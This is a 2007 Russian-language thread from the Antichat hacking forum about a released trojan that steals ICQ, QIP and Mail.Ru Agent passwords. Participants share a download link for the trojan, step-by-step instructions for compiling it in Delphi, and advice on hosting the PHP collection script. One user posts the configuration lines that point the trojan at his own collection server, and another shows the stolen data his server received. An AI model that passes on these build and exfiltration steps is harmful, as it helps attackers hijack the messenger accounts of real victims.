ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Skype, IRC, ICQ, Jabber и другие IM (https://forum.antichat.xyz/forumdisplay.php?f=13)
-   -   Релиз ICQ трояна. ver 2 (https://forum.antichat.xyz/showthread.php?t=33487)

VladislavSmirnov 05.03.2007 15:37

Палит файрволл... если закрыть доступ программе пишет все ту старую ошибку про " is not integer value.

VladislavSmirnov 05.03.2007 19:31

нашел новый баг... в последней версии... пароли из под Qip выдирает не достаточно верно... а точнее уже у двух челов у которых Qip выдрал пароль, да не правильный...

+toxa+ 05.03.2007 19:40

2 VladislavSmirnov
Посмотри описание обновлений последней версии qip=\

rez@r 05.03.2007 21:58

Блин, народ , подскажите как установить-то этот TICQ2003Decrypt ?? открываю, я проэкт Project1.dpr нажимаю "add file to project" выбираю \troy\Component\ICQ2003Decrypt.pas так или как добовлять то ??

Man9k 06.03.2007 20:16

смотри тут как устанавливать компоненты на делфи, даже с картинками сделали=\
зы гугль рулит :rolleyes:

А®ТеS 10.03.2007 18:38

Зделал новую версию 3.2. Пофиксены все извесные глюки, качаем тут - http://ggg123321.narod.ru/varlok_troy_3.2.rar
З.Ы. вот что значит видеть в людях лучшее =). Указал свой мыльник и не так давно получил на него около 1000 флудеских писем, с мыла пришлось слесть...теперь контактов публиковать небуду.

Tuborgi 11.03.2007 12:02

А®ТеS,автор,а как называеца тот самый файл в директории Trojan_Sources,который портит винду?и на скока сильно?и как избавляца от последствий?

Dj Dg 11.03.2007 18:38

Спасибо, классная трояна, автору + ..

А®ТеS 11.03.2007 20:42

Цитата:

Сообщение от Tuborgi
А®ТеS,автор,а как называеца тот самый файл в директории Trojan_Sources,который портит винду?и на скока сильно?и как избавляца от последствий?

ДА про винду это стеб был ваще то =)))), там обычный троянец "под меня", называется VTBA.scr, выложен с целью сбора СТАТИСТИЧЕСКОЙ информации (а не паролей как думают некоторые =) ).

prox1kk 15.03.2007 14:55

Автору респект ;) жаль плюсик не могу поставить...

DimOnOID 15.03.2007 15:34

*там обычный троянец "под меня", называется VTBA.scr, выложен с целью сбора СТАТИСТИЧЕСКОЙ информации (а не паролей как думают некоторые =) ).* /аха давай давай))......бугагагга

а ваще так троянец норма))

alex_d 18.03.2007 00:48

Фигово что слишком большой размер троя, а также палится фаерволами. Хотеось бы узнать, он тащит пароли от Qip 8010?

DimOnOID 18.03.2007 14:01

Цитата:

Сообщение от alex_d
Фигово что слишком большой размер троя, а также палится фаерволами. Хотеось бы узнать, он тащит пароли от Qip 8010?


таЩит..у меня вот стаЩЩИл )))))) ... !

alex_d 18.03.2007 14:37

И в каком он у тебя виде? Qip 8010 пароль сначала криптует, затем в base64, а потом уж в Hex. Что то я очень сомневаюсь что он тащит их в чистом виде, и что вобще он их тащит!

1nvesT 19.03.2007 15:30

Народ кому не трудно кто разобрался в трое напишите в IcQ 9643765 плюс подкину

1nvesT 19.03.2007 15:59

ArTeS плиз как будеш свободен стукни в асю!
и кстате вот что выхрдит при запуске троя вылазеет окошечко на сниф точней на loh.log пасы приходят от icq норм а от квипа 44494E41 вот такой пароль приходит поможите плиз !

alex_d 20.03.2007 00:15

Значит Квип стоит 8010, а от него парои приходят не правильные, если ты напишешь тот пароль который пришел в Хексе то получишь начало названия компа! А вобще пока не видел не одного троя, пинча тянущего пароли от 8010. А во вторых, даже если ты и сможешь их вытащить, то они все равно шифрованы: сначала криптовка, затем base64, а потом Хексом! Я считаю что сейчас тащить пароли от асек не оправдано пинчем.... т.к у большинства народа стоит именно Квип, и чтобы достать и расшифровать пароли надо долго и много поработать :)!

gormet 20.03.2007 21:47

надо за бугор двигать ентот трой - тама поди проканает)))))

3DViruzZ 21.03.2007 03:36

насколько я понял троян не пукает фаер
и не понятно как там с паролями от квипа 8010. лана, щас буду сам пробовать.
автору респект. поставлю + при первой возможности

P.S.:
Цитата:

Сообщение от А®ТеS
... троянец ко всему прочему теперь еще и прет пароли от Mail.Ru Agent (сохраненные пароли токо). Это главное отличие троянца от предыдущих. Ради этого (блин) даже пишлось искать и ставить этот долбанный агент!!! К слову сказать, кто его писал, делал это не руками!!!

жжошь )

Mosvit 25.03.2007 13:19

Подскажите правильно ли я делаю?
1. Сначала я создаю сайт (на narod'e можно?), потом скидываю на него все файлы которые находятся в папке new_sniffer.
2. Потом открываю с помощью делфи вот этот файл ICQ2003Decrypt.pas ?
Что делать после этого, что надо изменять?

А вообще если не трудно свяжитесь со мной по аське 218-239-500 , за мной +

Man9k 25.03.2007 15:38

Цитата:

Сообщение от Mosvit
Подскажите правильно ли я делаю?
1. Сначала я создаю сайт (на narod'e можно?), потом скидываю на него все файлы которые находятся в папке new_sniffer.

Естественно нельзя, нужен хостинг с поддержкой php :)

Rosssi 27.03.2007 17:45

Не приходят пароли хостинг jino-net.ru
мыло на майл.ру.
Что я делаю не так ?

Rosssi 27.03.2007 17:48

//Меняем здесь!!!!
//Change hear!!!!
Server_Addr: PChar= 'games-gothic.jino-net.ru';
ScriptName: PChar= 'http://www.games-gothic.jino-net.ru/need.php';
hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded';
Вотак выглядит у меня...

Mosvit 29.03.2007 09:03

Цитата:

Сообщение от А®ТеS
С проектом идет компонент TICQ2003Decrypt (автор не я, автор CobanS), его нужно установить.

С помощью какой программы его нужно установить?

xaldey 29.03.2007 11:38

я не могу у меня сердце кровю обливаеться: врубаем delphi идем file>close all. потом component > install component > brouse дальше откриваем ICQ2003Decrypt. pas > yes > file >close all > all . > в папку troyan_sources кидаем ICQWorcks.dcu > откриваем troyan_sources/Project1.dpr > изменяем параметри на нужние > жмем ctrl +F9 > файл создался. ps: если ето была защита от очень умных людей - ногами по голове не бейте.

IrokezeG 02.04.2007 11:55

Всем привет. Возникла одна проблема, установил троя создал хост на h17 вообщем сделал все как было описано, но почему-то приходят не пароли, а номер моей аськи. Может кто знает в чем тут дело? Приходят данные в таком виде...
[QUOTE]IP адрес:
***.***.***.***-мой IP
Дата прибытия:
Friday 30th of March 2007 12:42:01 PM
Данные:
********; -номер моей аськи

xaldey 12.04.2007 13:29

переделал сорци троя нада затестить кто возьметься?


Время: 21:27